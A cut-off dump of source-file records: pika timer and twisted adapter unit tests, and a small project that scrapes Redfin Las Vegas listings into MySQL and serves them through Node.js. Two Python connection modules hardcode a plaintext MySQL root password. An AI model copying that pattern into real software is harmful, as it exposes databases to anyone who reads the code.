already_processed\n" }, { "alpha_fraction": 0.5796964764595032, "alphanum_fraction": 0.5985041260719299, "avg_line_length": 38.011329650878906, "blob_id": "96917bc1dc79d7b8b5ed040c68fcb27aeddfb10c", "content_id": "72e3db59616c8e55ed74bbcac82816fca0998600", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13771, "license_type": "permissive", "max_line_length": 77, "num_lines": 353, "path": "/tests/unit/select_connection_timer_tests.py", "repo_name": "hugovk/pika", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests for SelectConnection _Timer and _Timeout classes\n\n\"\"\"\n\nimport time\nimport unittest\n\nimport mock\n\nfrom pika.adapters import select_connection\n\n\n# Suppress protected-access\n# pylint: disable=W0212\n\n# Suppress missing-docstring\n# pylint: disable=C0111\n\n# Suppress invalid-name\n# pylint: disable=C0103\n\nclass TimeoutClassTests(unittest.TestCase):\n \"\"\"Test select_connection._Timeout class\"\"\"\n\n def test_properties(self):\n now = time.time()\n cb = lambda: None\n timeout = select_connection._Timeout(now + 5.3, cb)\n self.assertIs(timeout.callback, cb)\n self.assertEqual(timeout.deadline, now + 5.3)\n\n def test_non_negative_deadline(self):\n select_connection._Timeout(0, lambda: None)\n select_connection._Timeout(5, lambda: None)\n\n with self.assertRaises(ValueError) as cm:\n select_connection._Timeout(-1, lambda: None)\n\n self.assertIn('deadline must be non-negative epoch number',\n cm.exception.args[0])\n\n def test_non_callable_callback_raises(self):\n with self.assertRaises(TypeError) as cm:\n select_connection._Timeout(5, None)\n\n self.assertIn('callback must be a callable, but got',\n cm.exception.args[0])\n\n with self.assertRaises(TypeError) as cm:\n select_connection._Timeout(5, dict())\n\n self.assertIn('callback must be a callable, but got',\n cm.exception.args[0])\n\n def test_eq_operator(self):\n # Comparison should be by deadline only\n t1 = select_connection._Timeout(5, lambda: None)\n t2 = select_connection._Timeout(5, lambda: 5)\n self.assertEqual(t1, t2)\n\n t2 = select_connection._Timeout(10, lambda: 5)\n self.assertNotEqual(t1, t2)\n\n def test_lt_operator(self):\n # Comparison should be by deadline only\n t1 = select_connection._Timeout(4, lambda: None)\n t2 = select_connection._Timeout(5, lambda: 5)\n self.assertLess(t1, t2)\n\n t2 = select_connection._Timeout(4, lambda: 5)\n self.assertFalse(t1 < t2)\n\n t2 = select_connection._Timeout(3, lambda: 5)\n self.assertFalse(t1 < t2)\n\n def test_le_operator(self):\n # Comparison should be by deadline only\n t1 = select_connection._Timeout(4, lambda: None)\n t2 = select_connection._Timeout(4, lambda: 5)\n self.assertLessEqual(t1, t2)\n\n t2 = select_connection._Timeout(5, lambda: 5)\n self.assertLessEqual(t1, t2)\n\n t2 = select_connection._Timeout(3, lambda: 5)\n self.assertFalse(t1 <= t2)\n\n\nclass TimerClassTests(unittest.TestCase):\n \"\"\"Test select_connection._Timer class\"\"\"\n\n def test_close_empty(self):\n timer = select_connection._Timer()\n timer.close()\n self.assertIsNone(timer._timeout_heap)\n\n def test_close_non_empty(self):\n timer = select_connection._Timer()\n t1 = timer.call_later(10, lambda: 10)\n t2 = timer.call_later(20, lambda: 20)\n timer.close()\n self.assertIsNone(timer._timeout_heap)\n self.assertIsNone(t1.callback)\n self.assertIsNone(t2.callback)\n\n def test_no_timeouts_remaining_interval_is_none(self):\n timer = select_connection._Timer()\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_call_later_non_negative_delay_check(self):\n now = time.time()\n\n # 0 delay is okay\n with mock.patch('time.time', return_value=now):\n timer = select_connection._Timer()\n timer.call_later(0, lambda: None)\n self.assertEqual(timer._timeout_heap[0].deadline, now)\n self.assertEqual(timer.get_remaining_interval(), 0)\n\n # Positive delay is okay\n with mock.patch('time.time', return_value=now):\n timer = select_connection._Timer()\n timer.call_later(0.5, lambda: None)\n self.assertEqual(timer._timeout_heap[0].deadline, now + 0.5)\n self.assertEqual(timer.get_remaining_interval(), 0.5)\n\n # Negative delay raises ValueError\n timer = select_connection._Timer()\n with self.assertRaises(ValueError) as cm:\n timer.call_later(-5, lambda: None)\n self.assertIn('call_later: delay must be non-negative, but got',\n cm.exception.args[0])\n\n def test_call_later_single_timer_expires(self):\n now = time.time()\n\n with mock.patch('time.time', return_value=now):\n bucket = []\n timer = select_connection._Timer()\n timer.call_later(5, lambda: bucket.append(1))\n\n # Nothing is ready to expire\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Advance time by 5 seconds and expect the timer to expire\n with mock.patch('time.time', return_value=now + 5):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [1])\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_call_later_multiple_timers(self):\n now = time.time()\n\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n timer.call_later(5, lambda: bucket.append(1))\n timer.call_later(5, lambda: bucket.append(2))\n timer.call_later(10, lambda: bucket.append(3))\n\n # Nothing is ready to fire yet\n self.assertEqual(timer.get_remaining_interval(), 5)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Advance time by 6 seconds and expect first two timers to expire\n with mock.patch('time.time', return_value=now + 6):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [1, 2])\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertEqual(timer.get_remaining_interval(), 4)\n\n # Advance time by 10 seconds and expect the 3rd timeout to expire\n with mock.patch('time.time', return_value=now + 10):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [1, 2, 3])\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_add_and_remove_timeout(self):\n now = time.time()\n\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n timer.call_later(10, lambda: bucket.append(3)) # t3\n t2 = timer.call_later(6, lambda: bucket.append(2))\n t1 = timer.call_later(5, lambda: bucket.append(1))\n\n # Nothing is ready to fire yet\n self.assertEqual(timer.get_remaining_interval(), 5)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Cancel t1 and t2 that haven't expired yet\n timer.remove_timeout(t1)\n self.assertIsNone(t1.callback)\n self.assertEqual(timer._num_cancellations, 1)\n timer.remove_timeout(t2)\n self.assertIsNone(t2.callback)\n self.assertEqual(timer._num_cancellations, 2)\n self.assertEqual(timer.get_remaining_interval(), 5)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer._num_cancellations, 2)\n self.assertEqual(timer.get_remaining_interval(), 5)\n self.assertEqual(len(timer._timeout_heap), 3)\n\n # Advance time by 6 seconds to expire t1 and t2 and verify they don't\n # fire\n with mock.patch('time.time', return_value=now + 6):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer._num_cancellations, 0)\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertEqual(timer.get_remaining_interval(), 4)\n\n # Advance time by 10 seconds to expire t3 and verify it fires\n with mock.patch('time.time', return_value=now + 10):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [3])\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_gc_of_unexpired_timeouts(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch.multiple(select_connection._Timer,\n _GC_CANCELLATION_THRESHOLD=1):\n with mock.patch('time.time', return_value=now):\n t3 = timer.call_later(10, lambda: bucket.append(3))\n t2 = timer.call_later(6, lambda: bucket.append(2))\n t1 = timer.call_later(5, lambda: bucket.append(1))\n\n # Cancel t1 and check that it doesn't trigger GC because it's\n # not greater than half the timeouts\n timer.remove_timeout(t1)\n self.assertEqual(timer._num_cancellations, 1)\n timer.process_timeouts()\n self.assertEqual(timer._num_cancellations, 1)\n self.assertEqual(bucket, [])\n self.assertEqual(len(timer._timeout_heap), 3)\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Cancel t3 and verify GC since it's now greater than half of\n # total timeouts\n timer.remove_timeout(t3)\n self.assertEqual(timer._num_cancellations, 2)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertIs(t2, timer._timeout_heap[0])\n self.assertEqual(timer.get_remaining_interval(), 6)\n self.assertEqual(timer._num_cancellations, 0)\n\n def test_add_timeout_from_another_timeout(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n t1 = timer.call_later(\n 5,\n lambda: bucket.append(\n timer.call_later(0, lambda: bucket.append(2))))\n\n # Advance time by 10 seconds and verify that t1 fires and creates t2,\n # but timer manager defers firing of t2 to next `process_timeouts` in\n # order to avoid IO starvation\n with mock.patch('time.time', return_value=now + 10):\n timer.process_timeouts()\n t2 = bucket.pop()\n self.assertIsInstance(t2, select_connection._Timeout)\n self.assertIsNot(t2, t1)\n self.assertEqual(bucket, [])\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertIs(t2, timer._timeout_heap[0])\n self.assertEqual(timer.get_remaining_interval(), 0)\n\n # t2 should now fire\n timer.process_timeouts()\n self.assertEqual(bucket, [2])\n self.assertEqual(timer.get_remaining_interval(), None)\n\n def test_cancel_unexpired_timeout_from_another_timeout(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n t2 = timer.call_later(10, lambda: bucket.append(2))\n t1 = timer.call_later(5, lambda: timer.remove_timeout(t2))\n\n self.assertIs(t1, timer._timeout_heap[0])\n\n # Advance time by 6 seconds and check that t2 is cancelled, but not\n # removed from timeout heap\n with mock.patch('time.time', return_value=now + 6):\n timer.process_timeouts()\n self.assertIsNone(t2.callback)\n self.assertEqual(timer.get_remaining_interval(), 4)\n self.assertIs(t2, timer._timeout_heap[0])\n self.assertEqual(timer._num_cancellations, 1)\n\n # Advance time by 10 seconds and verify that t2 is removed without\n # firing\n with mock.patch('time.time', return_value=now + 10):\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertIsNone(timer.get_remaining_interval())\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertEqual(timer._num_cancellations, 0)\n\n\n def test_cancel_expired_timeout_from_another_timeout(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n t2 = timer.call_later(10, lambda: bucket.append(2))\n t1 = timer.call_later(\n 5,\n lambda: (self.assertEqual(timer._num_cancellations, 0),\n timer.remove_timeout(t2)))\n\n self.assertIs(t1, timer._timeout_heap[0])\n\n # Advance time by 10 seconds and check that t2 is cancelled and\n # removed from timeout heap\n with mock.patch('time.time', return_value=now + 10):\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertIsNone(t2.callback)\n self.assertIsNone(timer.get_remaining_interval())\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertEqual(timer._num_cancellations, 0)\n" }, { "alpha_fraction": 0.7038167715072632, "alphanum_fraction": 0.7160305380821228, "avg_line_length": 21.586206436157227, "blob_id": "55333dbc2e33089b8c22c8bc705f6803e4db4c0c", "content_id": "712651264b51caf70a98e0cc852ef05d7e883bee", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 655, "license_type": "permissive", "max_line_length": 69, "num_lines": 29, "path": "/tests/unit/twisted_tests.py", "repo_name": "hugovk/pika", "src_encoding": "UTF-8", "text": "\"\"\"\nTests for pika.adapters.twisted_connection\n\"\"\"\nimport unittest\n\nimport mock\n\nfrom pika.adapters import twisted_connection\n\n\n# missing-docstring\n# pylint: disable=C0111\n\n# invalid-name\n# pylint: disable=C0103\n\n\nclass TwistedProtocolConnectionTests(unittest.TestCase):\n\n @mock.patch('pika.connection.Connection.add_on_close_callback')\n def test_twisted_protocol_connection_call_parent(self, mock_add):\n twisted_connection.TwistedProtocolConnection(\n None,\n on_close_callback=self._on_close)\n mock_add.assert_called_once_with(self._on_close)\n\n @staticmethod\n def _on_close(connection, error):\n pass\n" } ]
3
AlanK27/zill
https://github.com/AlanK27/zill
29dc0b981a9d7b6d858bd8cf347dcf74882f8f41
d61096b48f727cba21d867f2ddfa57bb1c238743
331e6674af66137209f5a0b9d8d80f1b442e9c0a
refs/heads/main
2023-03-08T11:13:16.228013
2021-02-24T00:39:12
2021-02-24T00:39:12
291,178,802
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4891461730003357, "alphanum_fraction": 0.7018813490867615, "avg_line_length": 15.853658676147461, "blob_id": "852bbf57cc03cfcfd9d4a8a2b3e8efc82315c1d3", "content_id": "b5d4a1162ada2720c74c34346987ebbbfc7ec4bc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 691, "license_type": "permissive", "max_line_length": 24, "num_lines": 41, "path": "/requirements.txt", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "attrs==20.1.0\nAutomat==20.2.0\nbeautifulsoup4==4.9.1\nbs4==0.0.1\ncffi==1.14.2\nconstantly==15.1.0\ncryptography==3.1\ncssselect==1.1.0\nhyperlink==20.0.1\nidna==2.10\nincremental==17.5.0\nitemadapter==0.1.0\nitemloaders==1.0.2\njmespath==0.10.0\nlxml==4.5.2\nmysql==0.0.2\nmysql-connector==2.2.9\nmysqlclient==2.0.1\nparsel==1.6.0\npgdb==0.0.8\nProtego==0.1.16\npsycopg2==2.8.5\npsycopg2-binary==2.8.5\npyasn1==0.4.8\npyasn1-modules==0.2.8\npycparser==2.20\nPyDispatcher==2.0.5\nPyGreSQL==5.2\nPyHamcrest==2.0.2\nPyMySQL==0.10.0\npyOpenSSL==19.1.0\nqueuelib==1.5.0\nScrapy==2.3.0\nselenium==3.141.0\nservice-identity==18.1.0\nsix==1.15.0\nsoupsieve==2.0.1\nTwisted==20.3.0\nurllib3==1.25.10\nw3lib==1.22.0\nzope.interface==5.1.0\n" }, { "alpha_fraction": 0.5792300701141357, "alphanum_fraction": 0.6168308258056641, "avg_line_length": 18.61403465270996, "blob_id": "5657b84b0a1dbb4d9eeaaa67e6ed13d32768c641", "content_id": "295d9a154e2c6ecbfff35ca31810beeae83009f8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1117, "license_type": "permissive", "max_line_length": 38, "num_lines": 57, "path": "/data_scrapping/zillow_mine/spiders/sql_queries/initiate_table.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "CREATE TABLE IF NOT EXISTS main (\n dates date,\n addrs varchar(150),\n bedroom int,\n sqft int,\n bathroom int,\n parking int,\n price float(2),\n rental_in float(2),\n year int,\n price_sq float(2),\n neighbor varchar(5)\n);\nCREATE TABLE IF NOT EXISTS month1 (\n date date,\n address varchar(255) ,\n location varchar(255) ,\n price int\n);\nCREATE TABLE IF NOT EXISTS month6 (\n date date,\n address varchar(255) ,\n location varchar(255) ,\n price int\n);\nCREATE TABLE IF NOT EXISTS today (\n dates date,\n addrs varchar(150),\n bedroom int,\n sqft int,\n bathroom int,\n parking int,\n price float(2),\n rental_in float(2),\n year int,\n price_sq float(2),\n neighbor varchar(5)\n);\nCREATE TABLE IF NOT EXISTS week1 (\n date date,\n address varchar(255) ,\n location varchar(255) ,\n price int\n);\nCREATE TABLE IF NOT EXISTS yesterday (\n dates date,\n addrs varchar(150),\n bedroom int,\n sqft int,\n bathroom int,\n parking int,\n price float(2),\n rental_in float(2),\n year int,\n price_sq float(2),\n neighbor varchar(5)\n);" }, { "alpha_fraction": 0.6017699241638184, "alphanum_fraction": 0.6017699241638184, "avg_line_length": 16.384614944458008, "blob_id": "f935072ca35cae0f41ea0e479eb83db1c55b21e3", "content_id": "2afc819e83ab072fc74d8033111ef07f4c6f69f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "permissive", "max_line_length": 50, "num_lines": 13, "path": "/data_scrapping/start.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom zillow_mine.spiders.spider_selen import crawl\nfrom db_calc.execute import calc_execute\n\n\ndef run():\n print('starting')\n x = crawl()\n x.initiate()\n y = calc_execute()\n \n\nif __name__ == '__main__':\n run()" }, { "alpha_fraction": 0.6463022232055664, "alphanum_fraction": 0.6945337653160095, "avg_line_length": 19.799999237060547, "blob_id": "003e428558fb2658682ebe95066875ed410d5828", "content_id": "a2e54d3c5270d110ef50ec0fe3c11a6c9058993d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 311, "license_type": "permissive", "max_line_length": 54, "num_lines": 15, "path": "/data_scrapping/db_calc/queries/sql_queries/del_dups_main.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "drop table if exists del_dup;\ncreate table del_dup(\n\twith main2 as (\n\tselect * from main\n\twhere main.date > subdate(curdate(), interval 2 day))\n\tselect m1.*\n\tfrom \n\t\tmain2 m1, main2 m2\n\twhere\n\t\tm1.address = m2.address and\n\t\tm1.location = m2.location and\n\t\tm1.price = m2.price\n\tgroup by\n\t\tm1.address, m1.price\n);" }, { "alpha_fraction": 0.6117545962333679, "alphanum_fraction": 0.6177605986595154, "avg_line_length": 31.375, "blob_id": "a9f17e49b7cadb408d691b94623e69d1934782c2", "content_id": "23240620f6a89ee42f7038057408307376ec39d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2331, "license_type": "permissive", "max_line_length": 155, "num_lines": 72, "path": "/data_scrapping/zillow_mine/spiders/spider_selen.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom zillow_mine.spiders.bs4_json import bsj\nfrom zillow_mine.spiders.to_db import db_parse\nimport time\n\n\nclass crawl:\n\n\n def __init__(self, site = 'https://www.redfin.com/city/10201/NV/Las-Vegas/filter/max-days-on-market=1d'):\n self.path = 'C:/chromedriver/chromedriver.exe'\n self.site = site\n self.driver = []\n\n\n def crawler(self):\n wait = WebDriverWait(self.driver, 10)\n element = wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"PagingControls\")))\n q = self.driver.find_element_by_css_selector(\"button[class='ModeOption button-text']\")\n q.click()\n self.driver.switch_to_window(self.driver.window_handles[0])\n element_addr = wait.until(EC.presence_of_element_located((By.CLASS_NAME, \"location\")))\n fg = True\n while fg:\n spyder = bsj(page_source = self.driver.page_source)\n spyder.initate()\n fg = self.next_pg()\n self.driver.quit()\n\n\n def next_pg(self):\n wait = WebDriverWait(self.driver,10)\n wait.until(EC.element_to_be_clickable((By.ID, 'content')))\n try:\n q = self.driver.find_element_by_css_selector(\"button[class='clickable buttonControl button-text'][data-rf-test-id='react-data-paginate-next']\")\n q.click()\n wait.until(EC.visibility_of_element_located((By.CLASS_NAME, \"address\")))\n self.driver.switch_to_window(self.driver.window_handles[0])\n return True\n except:\n return False\n\n\n def db_check(self):\n conn = db_parse()\n conn.connect()\n fg = conn.check_db()\n conn.disconnect()\n return fg\n\n\n def initiate(self):\n if self.db_check():\n print('db check pass')\n self.driver = webdriver.Chrome(self.path)\n self.driver.get(self.site)\n print(self.driver.title)\n self.crawler()\n \n else:\n print('scrap was done already')\n\n\nif __name__ == '__main__':\n x = crawl()\n x.db_check()\n x.initiate()" }, { "alpha_fraction": 0.5097143054008484, "alphanum_fraction": 0.527999997138977, "avg_line_length": 19.761905670166016, "blob_id": "980a990e6627628b19ded74a3db294778d6f2ca1", "content_id": "92c79c290dd799cd69cbf44d4b327710a1f3deb4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "permissive", "max_line_length": 83, "num_lines": 42, "path": "/data_scrapping/db_calc/mysql_db/conn_db.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "import datetime\nfrom datetime import date, timedelta\nimport os\nimport mysql.connector\n\n\nclass db_conn:\n\n\n def __init__(self, db = 'rfin_db', user = 'root', port = '3306', ssl='prefer'):\n self.db = db\n self.host = '127.0.0.1'\n self.user = user\n self.password = 'whore11'\n self.conn = []\n self.cur = []\n\n\n def connect(self):\n self.conn = mysql.connector.connect(\n user = 'root',\n host = '127.0.0.1',\n password = self.password,\n database = self.db\n )\n self.cur = self.conn.cursor(buffered=True)\n print('conn connected')\n\n\n def disconnect(self):\n self.conn.commit()\n self.conn.close()\n\n\n def test_connection(self):\n self.connect()\n self.disconnect()\n\n\nif __name__ == '__main__':\n x = db_parse()\n x.test_connection()\n\n\n\n" }, { "alpha_fraction": 0.6283186078071594, "alphanum_fraction": 0.6283186078071594, "avg_line_length": 56, "blob_id": "de3001ed666bb1ddcd8b22533eb93cd0ad6f1598", "content_id": "a8f4e9d44442b19630efdc8139b03c3b84fb6ee4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 113, "license_type": "permissive", "max_line_length": 79, "num_lines": 2, "path": "/data_scrapping/zillow_mine/spiders/sql_queries/insert.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "INSERT INTO {tab} (date, address, location, price, beds, baths, sqft, per_sqft)\nVALUES (%s,%s,%s,%s,%s,%s,%s,%s);" }, { "alpha_fraction": 0.5186722278594971, "alphanum_fraction": 0.5207468867301941, "avg_line_length": 22.536584854125977, "blob_id": "a0b98f3b4567a9e7d07e3e49b0483e838dd16da8", "content_id": "c38e431d2a72e03817741240894c3f83fc0b4adf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 964, "license_type": "permissive", "max_line_length": 65, "num_lines": 41, "path": "/data_scrapping/db_calc/queries/queries.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "import os\nfrom db_calc.mysql_db.conn_db import db_conn\n\n\nclass query(db_conn):\n\n\n def __init__(self):\n super().__init__()\n self.path = os.getcwd() + \"\\db_calc\\queries\\sql_queries\"\n\n def del_dups(self):\n\n with open(self.path + '\\\\del_dups_main.sql', 'r') as rf:\n query = rf.read().split(';')\n for comm in query:\n self.cur.execute(comm)\n\n def weekly(self):\n\n with open(self.path + '\\\\weekly.sql', 'r') as rf:\n query = rf.read().split(';')\n for comm in query:\n self.cur.execute(comm)\n\n\n def monthly(self, months):\n \n with open(self.path + '\\\\monthly.sql', 'r') as rf:\n query = rf.read().split(';')\n for comm in query:\n self.cur.execute(comm.format(months))\n\n\n def initiate(self):\n self.connect()\n self.del_dups()\n self.weekly()\n self.monthly(1)\n self.monthly(6)\n self.disconnect()" }, { "alpha_fraction": 0.5388967394828796, "alphanum_fraction": 0.5388967394828796, "avg_line_length": 15.809523582458496, "blob_id": "8261236ce971b527afbb40ec2a15ff78caba09f5", "content_id": "6506014747e43484f8dabbe4100789d99631f38d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 707, "license_type": "permissive", "max_line_length": 41, "num_lines": 42, "path": "/node_server/model/DB.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nconst db = require('../util/db/mysql_db')\n\nmodule.exports = class Db {\n constructor(data) {\n this.data = data;\n }\n\n static fetchA(df, ofset, amnt) {\n return db.execute(`\n select * \n from ${df}\n order by address \n limit ${ofset},${amnt};`);\n }\n\n static db_size(df) {\n return db.execute(`\n select count(*) \n from ${df};`)\n }\n\n static db_search_size(df, addr) {\n return db.execute(`\n select count(*) \n from (${df})\n where address rlike ?\n ;`, [addr]\n )\n }\n\n static search(df, addr, ofset, amnt) {\n return db.execute(`\n select * \n from main \n where address rlike ?\n order by date desc\n limit ${ofset}, ${amnt}\n ;`, [addr]\n )\n }\n\n}\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.5862069129943848, "avg_line_length": 15, "blob_id": "003e7dfe25973fdc1f448957f9dace592b61d70a", "content_id": "e1e84bf04371e111bc8118d75a2d903114dd3394", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "permissive", "max_line_length": 41, "num_lines": 9, "path": "/data_scrapping/db_calc/execute.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom db_calc.queries.queries import query\n\n\ndef calc_execute():\n x = query()\n x.initiate()\n\nif __name__ == '__main__':\n calc_execute()\n" }, { "alpha_fraction": 0.4865076243877411, "alphanum_fraction": 0.4958936274051666, "avg_line_length": 24.787878036499023, "blob_id": "96dd998b374cc9af5b1013ad5679ebacc6cdd911", "content_id": "67134c502e355739de6f74e901e50c55fd2f8e83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2557, "license_type": "permissive", "max_line_length": 107, "num_lines": 99, "path": "/data_scrapping/zillow_mine/spiders/to_db.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "import datetime\nfrom datetime import date, timedelta\nimport os\nfrom os import listdir\nimport mysql.connector\n\n\nclass db_parse:\n\n\n def __init__(self, data = [], table = [], db = 'rfin_db', user = 'root', port = '3306', ssl='prefer'):\n \n self.data = data\n self.table = table\n self.db = db\n self.host = '127.0.0.1'\n self.user = user\n self.password = 'whore11'\n self.path = os.getcwd() + '\\zillow_mine\\spiders\\sql_queries'\n self.conn = []\n self.cur = []\n\n\n def connect(self):\n self.conn = mysql.connector.connect(\n user = 'root',\n host = '127.0.0.1',\n password = self.password,\n database = self.db\n )\n self.cur = self.conn.cursor(buffered=True)\n print('conn connected')\n\n\n def disconnect(self):\n self.conn.commit()\n self.conn.close()\n\n\n def query(self):\n self.insert_to_table(table='today', data=self.data)\n self.insert_to_table(table='main', data=self.data)\n\n\n def insert_to_table(self, table, data):\n with open(self.path + '\\\\insert.sql', 'r') as rf:\n query = rf.read().format(tab = table)\n for d in data: \n self.cur.execute(query, d)\n\n def check_db(self):\n self.conn = mysql.connector.connect(\n user = 'root',\n host = '127.0.0.1',\n password = self.password,\n database = self.db\n )\n cur = self.conn.cursor(buffered=True)\n\n\n\n with open(self.path + '\\\\initiate_table.sql', 'r') as rf:\n query = rf.read().split(';') \n for squ in query:\n cur.execute(squ, multi=True)\n\n try:\n cur.execute('select max(date) from today')\n datee = cur.fetchone()\n print(date.today())\n print(datee[0])\n if (date.today() > datee[0]):\n print('refreshing T_Y')\n with open(self.path + '\\\\operation.sql', 'r') as rf:\n query = rf.read().split(';') \n for squ in query:\n cur.execute(squ, multi=True)\n return True\n else:\n print('already scrapped today')\n return False\n \n except:\n print('fresh insert')\n return True\n\n\n def initiate(self):\n self.connect()\n self.query()\n self.disconnect()\n\n\nif __name__ == '__main__':\n x = db_parse()\n x.connect()\n if x.check_db():\n pass\n x.disconnect()\n\n\n\n\n" }, { "alpha_fraction": 0.7067307829856873, "alphanum_fraction": 0.7067307829856873, "avg_line_length": 21.88888931274414, "blob_id": "ff388dda6381ec517ec46573ff5191c37beaf63d", "content_id": "7b3ec65b0e67bf7e6c485e65d23c64191ce85c1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 208, "license_type": "permissive", "max_line_length": 63, "num_lines": 9, "path": "/node_server/routes/half_y.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nconst express = require('express');\n\nconst half_y_change = require('../controller/half_y_change.js')\n\nconst router = express.Router()\n\nrouter.get('/half_year', half_y_change.half)\n\nmodule.exports = router;\n\n" }, { "alpha_fraction": 0.5927505493164062, "alphanum_fraction": 0.6439232230186462, "avg_line_length": 21.90243911743164, "blob_id": "19193aab3c398354166e0bb95b08508040023cf1", "content_id": "ac26080c42f079bf94db290ae76f6035d2751e6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 938, "license_type": "permissive", "max_line_length": 65, "num_lines": 41, "path": "/data_scrapping/db_calc/queries/sql_queries/weekly.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "drop table if exists week1;\ncreate table week1 (\n\twith weekly as (\n\t\tselect * from main\n\t\twhere \n\t\t\tdate > subdate(curdate(), interval 1 week)\n\t),\n amax as ( \n\t\tselect m1.date, m1.address, m1.location, max(m1.price) as price\n\t\tfrom weekly m1, weekly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = max(m2.price)\n\t),\n amin as (\n\t\tselect m1.date, m1.address, m1.location, min(m1.price) as price\n\t\tfrom weekly m1, weekly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = min(m2.price)\n\t),\n week1 as ( \n select * from amax \n union all\n select * from amin\n )\n select m1.date, m1.address, m1.location, m1.price\n\tfrom week1 m1, week1 m2\n\twhere\n m1.address = m2.address and\n\tm1.location = m2.location and\n m1.price != m2.price\n );" }, { "alpha_fraction": 0.5959232449531555, "alphanum_fraction": 